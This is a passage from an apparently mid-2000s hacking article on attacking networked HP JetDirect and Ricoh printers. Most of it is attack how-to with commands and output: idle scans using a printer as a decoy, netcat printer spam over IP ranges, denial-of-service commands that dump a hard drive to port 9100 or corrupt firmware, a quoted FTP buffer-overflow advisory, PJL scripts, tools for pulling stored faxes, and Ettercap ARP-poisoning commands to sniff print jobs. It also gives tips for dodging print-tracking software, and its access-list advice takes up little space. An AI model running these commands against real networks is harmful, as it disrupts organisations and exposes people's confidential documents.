IF-MIB::ifSpecific.1 = OID: SNMPv2-SMI::zeroDotZero.0

RFC1213-MIB::atIfIndex.1.1.192.168.19.16 = INTEGER: 1




RFC1213-MIB::atPhysAddress.1.1.192.168.19.16 = Hex-STRING: 00 0A 95 A6 6C 00


RFC1213-MIB::atPhysAddress.1.1.192.168.31.254 = Hex-STRING: 00 0F 34 E8 DC 38

RFC1213-MIB::atPhysAddress.1.1.24.0.1.60 = Hex-STRING: 01 00 5E 00 01 3C

RFC1213-MIB::atNetAddress.1.1.192.168.19.16 = Network Address: 95:A0:13:10


RFC1213-MIB::atNetAddress.1.1.192.168.31.254 = Network Address: 95:A0:1F:FE

RFC1213-MIB::atNetAddress.1.1.24.0.1.60 = Network Address: E0:00:01:3C

IP-MIB::ipForwarding.0 = INTEGER: notForwarding(2)

I...Omitted for security and space reasons...

IP-MIB::ipAdEntAddr.192.168.1.2 = IpAddress: 192.168.1.2


IP-MIB::ipNetToMediaIfIndex.1.192.168.19.16 = INTEGER: 1

I...Omitted for security and space reasons...



IP-MIB::ipNetToMediaPhysAddress.1.192.168.19.16 = STRING: 0:a:95:a6:6c:0


IP-MIB::ipNetToMediaPhysAddress.1.192.168.31.254 = STRING: 0:f:34:e8:dc:38


IP-MIB::ipNetToMediaNetAddress.1.192.168.31.254 = IpAddress: 192.168.31.254


IP-MIB::ipNetToMediaType.1.192.168.31.254 = INTEGER: dynamic(3)

IP-MIB::ipNetToMediaType.1.24.0.1.60 = INTEGER: dynamic(3)

IP-MIB::ipRoutingDiscards.0 = Counter32: 2801


IP-MIB::icmpOutAddrMaskReps.0 = Counter32: 0

TCP-MIB::tcpRtoAlgorithm.0 = INTEGER: vanj(4)

TCP-MIB::tcpRtoMin.0 = INTEGER: 10 milliseconds

TCP-MIB::tcpRtoMax.0 = INTEGER: 120000 milliseconds


TCP-MIB::tcpRetransSegs.0 = Counter32: 20

TCP-MIB::tcpConnState.192.168.1.2.21.0.0.0.0.0 = INTEGER: listen(2)

TCP-MIB::tcpConnLocalAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress: 192.168.1.2

TCP-MIB::tcpConnLocalPort.192.168.1.2.21.0.0.0.0.0 = INTEGER: 21

TCP-MIB::tcpConnRemAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress: 0.0.0.0

TCP-MIB::tcpConnRemPort.192.168.1.2.21.0.0.0.0.0 = INTEGER: 0

TCP-MIB::tcpInErrs.0 = Counter32: 0

TCP-MIB::tcpOutRsts.0 = Counter32: 17832

UDP-MIB::udpInDatagrams.0 = Counter32: 8374653

UDP-MIB::udpNoPorts.0 = Counter32: 8135924

UDP-MIB::udpInErrors.0 = Counter32: 22054

UDP-MIB::udpOutDatagrams.0 = Counter32: 363574

UDP-MIB::udpLocalAddress.0.0.0.0.68 = IpAddress: 0.0.0.0

UDP-MIB::udpLocalPort.0.0.0.0.68 = INTEGER: 68

UDP-MIB::udpLocalAddress.192.168.1.2.137 = IpAddress: 192.168.1.2

The above command works well on Jetdirects, Richo Savins and other common network printers that support

SNMP. If you don't know the proper SNMP community name a quick sniff of the network with Ettercap or Dsniff

should revel it to you iif the admin is using using SNMP version 1 or 2. Most times the community name will just be

the default "public".

Using a JetDirect box as an map Idlescan Zombie

While I'm on the topic of Nmap and JetDirect boxes, they make great bouncers for stealth Idle scans (also know

as Zombie scans) since their IPIDs are incremental. Basically what happen is the Nmap scan is bounced off of the

JetDirect box and any logs on the target will show the IP of the JetDirect box as being the attacker. There are a few

problems with these kinds of scans, the biggest being that they are VERY slow. For more details on Idle scans see

the following URL:

http://www.insecure.org/nmap/idlescan.html

and the Nmap MAN page:


16 of 37 02/04/2009 08:17

-sI <zombie host[:probeport]>Idlescan: This advanced scan method allows for a truly blind TCP port scan ofthe target (meaning no packets are sent to the target from your real IPaddress). Instead, a unique side-channel attack exploits predictable "IP frag-mentation ID" sequence generation on the zombie host to glean information aboutthe open ports on the target. IDS systems will display the scan as coming fromthe zombie machine you specify (which must be up and meet certain criteria). Iwrote an informal paper about this technique at http://www.inse-cure.org/nmap/idlescan.html .

Besides being extraordinarily stealthy (due to its blind nature), this scantype permits mapping out IP-based trust relationships between machines. Theport listing shows open ports from the perspective of the zombie host. So youcan try scanning a target using various zombies that you think might be trusted(via router/packet filter rules). Obviously this is crucial information whenprioritizing attack targets. Otherwise, you penetration testers might have toexpend considerable resources "owning" an intermediate system, only to find outthat its IP isn't even trusted by the target host/network you are ultimatelyafter.

You can add a colon followed by a port number if you wish to probe a particularport on the zombie host for IPID changes. Otherwise Nmap will use the port ituses by default for "tcp pings".

Here is an example of Nmap being run using a JetDirect box as a bouncer. I've used the -P0 option so that the

host running Nmap does not ping the target first, lessening the stealth value by giving away the scanners true IP.

Irongeek:~# nmap -P0 -sI 192.168.1.93 Irongeek.irongeek.com

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 17:22 EDTIdlescan using zombie 192.168.1.93 (192.168.1.93:80); Class: IncrementalInteresting ports on 192.168.1.5:(The 1654 ports scanned but not shown below are in state: closed|filtered)PORT STATE SERVICE22/tcp open ssh25/tcp open smtp80/tcp open http110/tcp open pop3111/tcp open rpcbind139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds587/tcp open submission


Now, if 192.168.1.5 looks at its logs it will appear that 192.168.1.93 (the JetDirect box) was doing the scan.

Sneaky!

Setting up a direct IP printer in Windows and Linux

Setting up a direct IP printer can be useful from time to time; here are a few reasons why you might want to set

up one up:

1. Your main print server is unreliable.

2. Sometimes cutting out the middle man make a print job work when normally it would not. Some PDFs used to give

me fits when I used a Window 2000 server to host print shares, but printing directly to the IP printer worked like a

charm.

3. To bypass access rights to a printer or to get around print tracking software like Pharos Uniprint or Equitrac.

Rather then waste space on how to set up direct IP printing in Windows I'll point you to Microsoft's howto:

http://www.microsoft.com/technet/prodtechnol/windowsserver2003/


17 of 37 02/04/2009 08:17

library/ServerHelp/25468cbe-faab-424c-aae5-ddd333436c0d.mspx

and HP's:

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj06391

If you wish to script the installation in Windows check out:

https://engineering.purdue.edu/ECN/Resources/KnowledgeBase/Docs/20040216090320

For you Linux users it's pretty easy to set up a direct IP printer too. Make sure you have CUPS (Common Unix

Printing System) installed (for us Debian folks: apt-get install cupsys). Most Linux distributions have a GUI setup

wizard now, but you can also add a direct IP printer from the shell by using a command like the following:

foomatic-configure -s cups -n My-Remote-JetDirect -c socket://192.168.1.2:9100/

Of course, you will want to change the IP and maybe the name to reflect your network and printer setup. If for

some reason

http://192.168.4.2:631/printer

http://192.168.4.2:631/ipp

Spamming Printers

I'm rather surprised with the amount of E-mail, Net Message and Fax spam that know one seems to have tried

Printer Spam. First, the attacker would need to have something to iterate though printers. I wrote a quick tool for

Linux and Windows call IPIterator that does just this:

http://www.irongeek.com/i.php?page=security/ipiterator

The following example assumes that port 9100/tcp is open past the firewall (don't laugh, I've seen it), but with some

motification I'm pretty sure it could be made to work with IPP and FTP enabled printers too. All one has to do is

generate a PostScript or PCL file with the content they want to send it the spam message. The Windows "Printer to

File" option works well for this. In a pinch a plain old text file will also work. Then they can use Netcat and IPIterator

to send the print job to a whole IP range of printers.

Irongeek@Irongeek:~# ./ipiterator 192.168.3.1-5,25,"cat spam.prn|netcat -q 0 ~ip 9100"cat spam.prn|netcat -q 0 192.168.3.1 9100Starting thread 1cat spam.prn|netcat -q 0 192.168.3.2 9100Starting thread 2cat spam.prn|netcat -q 0 192.168.3.3 9100Starting thread 3cat spam.prn|netcat -q 0 192.168.3.4 9100Starting thread 4cat spam.prn|netcat -q 0 192.168.3.5 9100Starting thread 5DONEIrongeek@Irongeek:~#

Evil I know, maybe I should not have mentioned it as now it may become more common. This facility might also be

legitimately useful for sending out mass messages on a network where your work.

Side note on a Pharos Uniprint vulnerability

While this is not directly related to the article's main topic I thought that some of you would be interested in

knowing about a vulnerability with the Pharos Uniprint system. It looks like Pharos Uniprint saves the last print jobs

sent to a printer into C:\Program Files\Pharos\Temp\PORT*.PRN as a simple PCL print job which is readable by

everyone on the Windows box by default. With a quick NetCat command (seen later in this article in the sniffing and

replay section) or an FTP of the file to a JetDirect box it's easy to see what others have been printing out on that

Windows workstation. Not very secure huh? It seems that Pharos did fix this in later versions, as Edward Burhenn

stated in his email to me:


18 of 37 02/04/2009 08:17

This was a "bug" in an older version of Pharos for which

a hot fix was released:

The application of Pharos 7.0 Hot Fix 1 ensures that no

more spool file copies will be retained after print jobs for

both Popups and non-Popups printers. Existing copies of

old spool files in the ...\Pharos\Temp folder will need to

be deleted manually.

To avoid any further confusion could you post an update

to the article, perhaps directing folk to the hot fix which

can be downloaded from our website:

http://www.pharos.com/Support/index.html?

Thanks,

Ed

Edward Burhenn

Technical Specialist

DoSing the network or the printer

As should be obvious by now for those that have been paying attention, it's pretty trivial to cause a DoS (Denial

of Service) attack with a JetDirect box that's not password protected. A deviant user could just use the telnet or web

interface to set the IP of the JetDirect to the same IP as the gateway - instant routing confusion. Another option for

network mayhem would be to set the host name of the JetDirect box to that of another box on the network. This

would mess a few things up if the facility uses dynamic DNS for host names. Also notice form the UDP port scan

show earlier that the JetDirect box is running the NetBIOS naming service, so changing the host name on a Windows

network could cause name resolution problems.

As for DoSing the printer, if someone wanted to be a dick they could just hop onto their *nix box and cat their

hard drive to the printer, causing a print job the size of the local hard drive:

cat /dev/hda|netcat -q 0 192.168.1.2 9100

Much the same thing could be accomplished by FTPing your swap file to a JetDirect box that accepts FTP print

jobs.

Another thing that could be done is to upload a corrupted firmware to the JetDirect box. This can be done by

obtaining the HP Download Manager from:

http://www.hp.com/go/dlm_sw

and then attempting an upgrade of the firmware, but stopping the process halfway though. The JetDirect will be non

responsive until a full firmware is uploaded again. An interesting side note, you can upgrade the firmware on a

JetDirect even if you don't know the JetDirect's system password. Why HP did not require a password for a firmware

update I have no idea; it just seems like common sense that they would. From reading Slobotron's article (linked at

the bottom) it would seem you can also upgrade the firmware with Netcat.

On a lark I decided to test out the effects of connect to port 9100/tcp and holding the connection using the Telnet

command. I tested it on a Ricoh Savin Aficio 2045e and a JetDirect 300x (J3263A) and the result was that the

connection to port 9100/tcp seems to be single threaded. While I held the Telnet connection to port 9100 no other

print jobs could be sent to the printer! The connection should timeout after awhile. Imagine if someone used an active

connection on the LAN and a command like:

./ipiterator 192.168.1.*,25,"telnet ~ip 9100"

to knock out printing to a whole LAN! See the section above for more info on IPIterator.


19 of 37 02/04/2009 08:17

Because of the relatively weak IP stacks in most network printers there are a lot of other little Denial of Service

exploits. I recommend checking out http://www.securityfocus.com/bid/ for more DoS attacks. One of the more

interesting attacks to be found recently (12/19/2006)comes form researcher Joxean Koret. I've got to thank the

Pauldotcom pod cast (episode 55) for pointing it out to me. It seems that Mr. Koret found a flaw in some HP

Jetdirect's that permanently bricks the printer server to the point it has to be sent back to HP to be fixed. For those

that don't understand the term "brick" it means that the device has be made inoperatable because of a bad firmware

or an electrical problem. This is a serious flaw since it effectively turns the JetDirect into a paperweight. In Joxean

Koret's words:

HP FTP Printer Server Denial Of Service

---------------------------------------

Author: Joxean Koret

Date: 2006

Location: Basque Country

Affected Software

-----------------

Vendor: Hewlett Packard

Description: HP Printers FTP Server Denial Of Service

Description

-----------

A problem exists in almost any currently used HP Printer with the FTP

Print Server.

Version 2.4 of the FTP Print Server will crash with only one shoot.

Version 2.4.5, which is latest, will need various shoots (the number of

shoots needed is currently unknow).

While playing with my own FTP Fuzzer I tried finding flaws in HP's

Printers. After trying with 5 printers I found the problem in all of

these. The problem is a buffer overflow in the LIST and NLST command. In

version 2.4 a single shoot sending a LIST command with a long string

(about 256 characters) is sufficient enough to test the vulnerability.

Take care trying it because two of my printers were crashed completely

(you will need to make use of your warranty ;] ). Against 2.4 versions

it can crash the complete printer and be unresponsive even after

rebooting it.

In version 2.4.5 (which is the latest) you need to send various times

long shoots to the parameter LIST (a single shoot will not crash,

printer will answer with a "Path too long" message). You will need to

send various times a LIST command with long strings. When trying with

other commands you will see that no problem is raised and the printer

will always be responsive. After a successfull attack you may completely

crash your printer (i.e., calling technical support to fix your crashed

printer).

The problem can be easily triggered by using any FTP fuzzing tool. You

can crash your printer in about 10 second(s) in a LAN.

The printer models I used in my tests are:

* HP LaserJet 5000 Series (firmware R.25.15 / R.25.47)

* HP LaserJet 5100 Series (firmware V.29.12)


20 of 37 02/04/2009 08:17

Attached goes POCs for the vulnerabilities.

Workaround

----------

Disable the FTP print server as, surely, you aren't using it.

Disclaimer

----------

The information in this advisory and any of its demonstrations is

provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of

using the information or demonstrations provided in any part of this

advisory.

Contact

-------

Joxean Koret < joxeankoret [at] yah00 [D0T] es >

--

-----------------------------------

Agian, agian, egun batez

jeikiko dira egiazko Ziberotarrak,

egiazko euskaldunak,

tirano arrotzen hiltzeko

eta gure aiten aitek utzi daikien

lurraren populiari erremetitzeko.

-----------------------------------

It is not yet know which JetDirect print servers are effected by this exploit as few people want to take the

chance of destroying their own. I've mirrored his two proof of concept scripts if anyone would like to test them and

let me know which JetDirects it works on:

jd-dos2.4.5.py

jd-dos2.4.py

MITRE lists this bug as CVE-2006-6742. The buffer overflow in the LIST an NLST commands seem to

overwrite part of the firmware so my best guess is that cheaper print servers without flash memory like the 170x are

probably safe. From what I'm hearing HP is not taking this threat as seriously as they should given that someone

could cripple printing for days at a corporation using this exploit and a tool like IPIterator. The only know fix as of

yet is a preventative one, and that is to turn off the JetDirect's FTP service or to block port 21/TCP at the border of

the network the print server is on. If anyone has more information on this flaw please email me. See:

http://www.security.nnov.ru/Gnews955.html for more info on this vulnerability.

By the way, don't be the kind of person that would use one of the above techniques, I only mention them so that

admins know what they need to guard against.

Update 01/20/2007: Looks like HP may have fixed this issue with a newer firmware:

http://www.securitytracker.com/alerts/2007/Jan/1017532.html

Still, if anyone has more information please email me.

Changing the LCD display text using HPhack, IGhphack or Hijetter


21 of 37 02/04/2009 08:17

This is an old hack (1997) and does not accomplish much,

but it is fun! Silicosis of L0pht ([email protected]) wrote the original

exploit code for *nix systems and someone else ported it to

NT/2000/XP based systems. Although it's been out there for a long

time, it still works on every HP printer/JetDirect box I have seen.

What the HP display hack allows you to do is set the text that

displays on the little LCD panel of an HP printer. It accomplishes

this over the network by sending packets to a JetDirect box hooked

to the printer (or built into it).

The first thing you need to do is find out the IP or hostname

of the JetDirect box that services the printer. You can do this in

one of at least three ways. The first way is by hitting the little test

button on the JetDirect box that's connected to the printer. If the JetDirect card is built in you may have to go through

the menus and choose "Print Configuration". Another way is to go into your "Printers and Faxs" settings, right click

and bring up the properties of the printer in question, and look under the Ports tab for the hostname (npi******).

Once you have this information it's easy to run Silicosis ' little hack.

To run it from Windows just use the following syntax: hpnt Hostname Message

Windows Example:

C:\>hpnt npi769e71 "Irongeek"HP Display hack -- [email protected]: npi769e71Message: IrongeekConnecting....Sent 54 bytes

C:\>hpnt 192.168.1.14 "Irongeek Also"HP Display hack -- [email protected]: 192.168.1.14Message: Irongeek AlsoConnecting....Sent 59 bytes

C:\>

If you want to run it from Linux download the source code at the bottom of this section and compile it using gcc.

The syntax is the same as the Windows version. Below is an example of how to compile and run it:

[root@balrog root]# gcc -o hphack hp.chp.c:28:12: warning: multi-line string literals are deprecated[root@balrog root]# ./hphack 192.168.1.14 "Irongeek"HP Display hack -- [email protected]: 192.168.1.14Message: IrongeekConnecting....Sent 54 bytes[root@balrog root]#

A few ideas for messages: "Hey Baby", "X was Here", "I see You", "Redrum", "Kill". Enjoy. If you like you can

download Silicosis hack from one of these links:

Unix Source

Windows Source

Windows Binary

I'm working on my own GUI version with

extra features; its web page can be found here:

http://www.irongeek.com

/i.php?page=security/jetdirecthack

Unfortunately it's pretty buggy.


22 of 37 02/04/2009 08:17

The easiest tool to use may be Hijetter by

FtR of Phenoelit, which is covered in the next

section.

Phenoelit's Hijetter and PFT

Hijetter seems to be the Swiss army knife of HP JetDirect hacking. It can control a JetDirect box with PJL

commands, and works even if a password is set (at least on my HP JetDirect 300X).You can download the binary

and the source code for this app from:

http://www.phenoelit.de/hp/download.html

Below is a screen show of Hijetter 's interface. To use Hijetter just type in the IP or host name of your JetDirect

box and click the connect icon.

You should notice that a few of the icons at the bottom of the interface light up.

You can only use the icons that are lit up. The first icon, from left to right, lets you control the file system on the

JetDirect (if it has one), the next icon lets you make changes to the settings and the last icon lets you set the text that

displace on the LCD screen. I'll cover these tasks in reverse order since I'm contrary like that.

Setting the LCD Display with Hijetter

1. After you have connected to the

JetDirect box click the LCD Display

icon.

2. Type in the message you want the

printers LCD to display.


23 of 37 02/04/2009 08:17

3. If you check the "Failure" radio

button the printer will stop printing

until someone hits the ok/continue

/online button on the printer, or it's

reset.

4. Click the confirm button

and your message should

now appear on the printers LCD.

Changing settings with Hijetter

1. After you have connected to the JetDirect box click

the settings icon.

2. Find the environmental variable you want to change

and type in the value you want to set it to, keeping in

mind the limitations listed in the "Info" panel.

3. Use the assign button to set your

change. An M should appear next to the variable you

changed.

4. Click the confirm button and you're

done.

Using Hijetter to treat some JetDirect boxes as files/web servers

1. After you have connected to the JetDirect box click

the File System icon.

2. Use the arrows to transfer files to and from your

client to the JetDirect box. Keep in mind that you can

only transfer one file at a time with Hijetter.

3. The New Folder and Delete icons can be used

for their obvious functions.


24 of 37 02/04/2009 08:17

4. Click the confirm button and you're

done.

Finding stored faxes and print jobs on Jetdirect printers

Look around the file system and download any files that looks interesting. Most of them don't have obvious file

extensions so open them up in a text editor and look at the headers to try and figure out what they are. Here are a few

of the things I've found by searching around this way:

Location What I've found

/saveDevice/DigitalSend/jobs

Jpegs with names like DS000848.005 that seem to be either print jobs or Faxes .

/FaxOut Tif files from sent Faxes

/FaxInPCL files from received Faxes. See my NetCat and FTP tricks later for moreinformation on how to print them.

/Fax/act.logSeems to be a log of phone numbers where things have be faxed to or from.Could be useful for social engineering.

Also notice that the Hewlett-Packard LaserJet 4100 MFP we connected to has a 20Gig hard drive, which makes

for a great place to hide and serve large files. I've noticed on the MFP a file can be uploaded to:

/webserver/home/

and can be accessed from the printers web interface at:

http://192.168.1.4/hp/device/

For example, if you used Hijetter to upload "naughtylinuxgirls.avi" to "/webserver/home/" it can be accessed

from the web with the URL:

http://192.168.1.4/hp/device/naughtylinuxgirls.avi

Feel free to put your homepage on a printer. :)

If you're a *nix or Window command line boy, don't despair. The same folks from Phenoelit have provided PFT,

a command line utility that can do many of the same things as Hijetter. It can be downloaded and installed with these

commands:

mkdir pjllibcd pjllibwget http://www.phenoelit.de/hp/libPJL-1.3-src.tgztar -xzf libPJL-1.3-src.tgzmakecd pft/make

Here is an example of what it looks like on the command line after you bring up the help page; look at all of the

options:

Irongeek:/home/adrian/pjllib/pft# ./pftPFT - PJL file transfer


25 of 37 02/04/2009 08:17

FX of Phenoelit <[email protected]>Version 0.7 ($Revision: 1.8 $)

pft> helphelp <command>quitserver [hostname]port [port number]connectcloseenv {read|print|show|set|options|changed|commit|unprotect|bruteforce}message "Display Msg"failure "Failure Msg"volumeschvol [vol:]pwdlscd [directory]mkdir [directory]rm [file]get [file]put [local file]append [local file] [file]lpwdlcd [directory]sessiontimeout [timeout]pausepft>

PFT also has some limited scripting ability by piping in commands from a text file as this example shows:

Irongeek:/home/adrian/pjllib/pft# catmypftscript.txtserver 192.168.31.213connectlsquitIrongeek:/home/adrian/pjllib/pft# ./pft<mypftscript.txtPFT - PJL file transferFX of Phenoelit <[email protected]>Version 0.7 ($Revision: 1.8 $)

pft> Server set to 192.168.31.213pft> Connected to 192.168.31.213:9100Device: HP LaserJet 4100 MFPpft> 0:\. - d.. - dPermStore - dPostScript - dPJL - dsaveDevice - dcpbLog 5227 -Fax - dsolution - dwebServer - dFaxOut - dFaxIn - dpft>Irongeek:/home/adrian/pjllib/pft#

Since Phenoelit provides the source code it could be an interesting project to write new automated tools for

extracting information from remote JetDirect boxes.

Using IP ACLs to restrict access

One of the few way that HP gives you to lock down a printer is IP ACLs (Access Control Lists). Other network

printer manufactures offer similar functionality. While the syntax may differ a little form JetDirect to JetDirect the

basics are the same. On newer JetDirects you can use the web interface to restrict what IPs can connect to the printer

(normally you just want the CUPS or Windows print server to connect) but on most all of them you can use the

Telnet interface to restrict what IPs can connect. This log should give you an idea of how the "acl allow: ip"


26 of 37 02/04/2009 08:17

command is used:

Irongeek@Irongeek:~# telnet 192.168.1.22Trying 192.168.1.22...Connected to 192.168.1.22.Escape character is '^]'.

HP JetDirect

Password:pass

You are logged in

Please type "?" for HELP, or "/" for current settings> allow:0> quit


IP Address : 192.168.1.22Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : buttHost Name : NPI6D47B6Default Get Cmnty : Disabled

DHCP Config : DisabledPasswd : EnabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : EnabledUser QuittingConnection closed by foreign host.Irongeek@Irongeek:~# telnet 192.168.33.22Trying 192.168.33.22...Connected to 192.168.33.22.Escape character is '^]'.

HP JetDirect

Password:pass

You are logged in

Please type "?" for HELP, or "/" for current settings> allow:192.168.19.56> allow:192.168.20.0 255.255.255.0> allow:listAccess Control List:IP: 192.168.19.56 Mask: 255.255.255.255IP: 192.168.20.0 Mask: 255.255.255.0> quit


IP Address : 192.168.33.22Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : buttHost Name : NPI6D47B6Default Get Cmnty : Disabled

DHCP Config : DisabledPasswd : EnabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : EnabledUser QuittingConnection closed by foreign host.


27 of 37 02/04/2009 08:17

Irongeek@Irongeek:~#

Notice that if we now try to attach or port scan the JetDirect from an unauthorized host no connections can be

made to any of the ports:

root@ScanBox:~# nmap -A 192.168.1.22

Starting Nmap 4.00 ( http://www.insecure.org/nmap/ ) at 2006-03-16 21:30 ESTWarning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCPportAll 1672 scanned ports on 192.168.1.22 are: closedMAC Address: 00:60:B0:6D:47:B6 (Hewlett-packard CO.)Device type: general purpose|VoIP phone|broadband router|printer|printserver|scanner|specialized|telecom-miscRunning: Alpha Micro AMOS, Clipcomm embedded, D-Link embedded, DEC TOPS-20, HP embedded, Liebertembedded, Nortel embedded, SMC embeddedToo many fingerprints match this host to give specific OS details

Nmap finished: 1 IP address (1 host up) scanned in 16.921 secondsroot@ScanBox:~#

It's generally a good idea to set up this kind of IP restriction as it can stop some forms of attack (though not

sniffing of print jobs using ARP poisoning).

Don't forget to look for Stored Documents via the web interface

I'm mostly putting this here because of the Ricoh Savins I've played with, but it's good advice for HP printers

too. Look for Stored Documents via the web interface on the printers you find; many times users will save print jobs

and faxes where the can be accessed from the web without even realizing it. I've found quite a few things this way in

the past while performing audits.

Coding your own scripts with PHP, Perl and PJL

I thought some of you might be interested in writing you own scripts to change the printer display, or other tasks

evolving PJL. First, read some of the PJL references linked in the reference section, then play around with telneting

in an issuing the PJL commands directly. You will notice that there are quite a few that can be used to query the

status of the printer:

Irongeek:~# telnet 192.168.1.33 9100

Trying 192.168.1.33...

Connected to 192.168.1.33.

Escape character is '^]'.

@PJL INFO ID

@PJL INFO ID

"LASERJET 4000"

@PJL INFO STATUS

@PJL INFO STATUS

CODE=10001

DISPLAY="Ready"

ONLINE=TRUE

@PJL INFO PAGECOUNT

@PJL INFO PAGECOUNT

536225

@PJL INFO MEMORY

@PJL INFO MEMORY

TOTAL=2526160

LARGEST=1204208

]̂

telnet> quit

Connection closed.

Irongeek:~#


28 of 37 02/04/2009 08:17

I decided to use Perl for my examples since its easy to use, multiplatform and pretty easy to do Sockets with. Most

*nix systems should have Perl already, if you use Windows download and install Activestate's ActivePerl from here:

http://www.activestate.com/Products/ActivePerl/

Another useful resource is the "Printer Job Language Technical Reference Manual" which can be found at:

http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf

read it and learn what can be done with PJL. Here are two links that may help you understand Perl and Socket

programming:

http://www.perlfect.com/articles/sockets.shtml

http://www.rocketaware.com/perl/perlipc/TCP_Clients_with_IO_Socket.htm

Here are a few quick Perl scripts. This first one just lets you set the LCD display on a JetDirect enabled HP

Printer:

#!/usr/bin/perl -w#File name: lcd.pjl.pl#From http://www.Irongeek.com [email protected]#Script to set LCD Display an HP JetDirect printer#Syntax: ./lcd.pjl.pl <ip-of-jetdirect> "Some Message"use IO::Socket;$ip = $ARGV[0];$lcdtext = $ARGV[1];my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => '9100', Proto => 'tcp', );die "Could not create socket, Monkey boy! $!\n" unless $sock;print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"$lcdtext\"\n";print $sock "\e%-12345X\n";close($sock);

Sometimes the above version does not work, so try:

#!/usr/bin/perl -w#File name: lcd.pjl.pl#From http://www.Irongeek.com [email protected]#Script to set LCD Display an HP JetDirect printer#Syntax: ./lcd.pjl.pl <ip-of-jetdirect> "Some Message"use IO::Socket;$ip = $ARGV[0];$lcdtext = $ARGV[1];my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => '9100', Proto => 'tcp', );die "Could not create socket, Monkey boy! $!\n" unless $sock;print $sock "\@PJL RDYMSG DISPLAY = \"$lcdtext\"\n";close($sock);

It would seem that sometimes the escape character (27 dec, 1B hex, 033 oct) and "%-12345X" is needed and

sometimes it's not. It appears from my reading that it's only needed for UEL (Universal Exit Language) commands. I'd

like more details on when it has to be used and when it does not, email me if you know.

This script just sends a simple line of text to the printer directly:

#!/usr/bin/perl -w#File name: print.pjl.pl#From http://www.Irongeek.com [email protected]#Script to send a simple line of text to a HP JetDirect printer#Syntax: ./print.pjl.pl <ip-of-jetdirect> "Some Text To Print"use IO::Socket;$ip = $ARGV[0];$texttoprint = $ARGV[1];my $sock = new IO::Socket::INET (


29 of 37 02/04/2009 08:17

PeerAddr => $ip, PeerPort => '9100', Proto => 'tcp', );die "Could not create socket, Monkey boy! $!\n" unless $sock;print $sock $texttoprint;close($sock);

This one does a countdown on the LCD screen, then ends with a bang:

#!/usr/bin/perl -w#File name: selfdestructlcd.pjl.pl#From http://www.Irongeek.com [email protected] #Script to send a count down to the printers LCD, ending in a Bang.#Syntax: ./selfdestructlcd.pjl.pl <ip-of-jetdirect>use IO::Socket;$ip = $ARGV[0];my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => '9100', Proto => 'tcp', );die "Could not create socket, Monkey boy! $!\n" unless $sock;for ($i = 30; $i >= 0; $i--) { print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Self Destruct in $i\"\n"; print "\e%-12345X\@PJL RDYMSG DISPLAY = \"Self Destruct in $i\"\n"; sleep 1; }print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Bang!!!\"\n";sleep 5;print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Ready\"\n";print $sock "\e%-12345X\n";close($sock);

I know some of you want the script that lets you make a printer web cam like the one I had up for a short

while. You can download the PHP source code here:

http://irongeek.com/downloads/printeraction.txt

If you write any interesting scripts send them to me and I'll post them with your credits. Happy scripting!

Fixing a busted hard drive with Ghost

Matthew Hinton (info [at] fireshadow.net) sent me some details on fixing a broken hard drive in an HP 4100

MFP with Ghost, could be useful to quite a few of you in your printer is out of warranty:

Don't know if you'd be interested in the details for your page or not.

Where I work at we've been able to make a ghost image of the 4100 MFP hard

drive load. This allows us to put it on new hard drives to reinstall in

the EIO slot. What drove us to this insanity is as follows.

We have about 10 or so of the 4100 MFP's here. After the warranty

expired, they started getting the same error - "49.FF81 error" on the

display. Pretty much it's a new EIO hard disk. HP has a procedure that

may or may not work to reset it. $49 to talk to a tech over the phone

since it's out of warranty. $345 for a new EIO disk from HP. Local guy

wants $515 to come out with a new disk to fisk it.

Taking apart the bad one, we noticed that it's a standard Toshiba 20 Gb

laptop hard drive. The PC tech went and got a known good EIO hard disk,

and we made a ghost image of it. We tried sending the ghost image back

over to the bad drive, but got a "drive too smal error". The ghost image

took fine on a seagate 40 Gb note book drive. Put the seagate drive on

the controller card, reinstalled and it's working fine.


30 of 37 02/04/2009 08:17

Anyway, thanks for putting up the informative page. I'm using Hijetter

right now to look at the variables on the printer.

Sincerely,

Matthew Hinton

Sniffing print jobs and replaying them

How often do folk print things and think as long as no one gets hold of the hard copy there's no security risk? As

it turns out, sniffing print jobs is pretty easy if you can get on the same LAN segment as the printer or print server.

Since the print jobs are not encrypted sniffing and reprinting them to your own printer is comparatively a breeze if

you know how. This example shows how to sniff between a Windows 2003 base print server and a JetDirect or Ricoh

Savin based network printer that uses AppSocket (port 9100/tcp) for communications, but the principles should apply

to other setups as well.

1. First we have to pull off a MitM (Man in the Middle) attack by ARP poisoning the JetDirect box and the Windows

print server and saving the packets to a Pcap file. I'll use Ettercap on a Linux box to do this, but other apps may work

as well. To pull it off I will use the following Ettercap command:

ettercap -T -q -w print.dump -M ARP /192.168.1.2/ //

where 192.168.1.2 is the IP of my network printer. Note that this will cover all of your bases, but can cause one hell

of an ARP storm since Ettercap has to ARP poison every host on the subnet. In some cases it might be better (and

faster) to just ARP poison between two host you know the traffic will be going though. Here is an example:

ettercap -T -q -w print.dump -M ARP /192.168.1.2/ /192.168.22.47/

where 192.168.1.2 is the IP of the network printer and 192.168.22.47 is the ip of the Window/*nix print server or PC

sending the print job. Hit the "q" key at any time to stop the ARP poisoning and sniffing.

2. Now that we have our Pcap (also sometimes called a libpcap or tcpdump file) we have to open it up in Ethereal.

Just use the File->Open menu and point it to the print.dump file made by Ettercap.

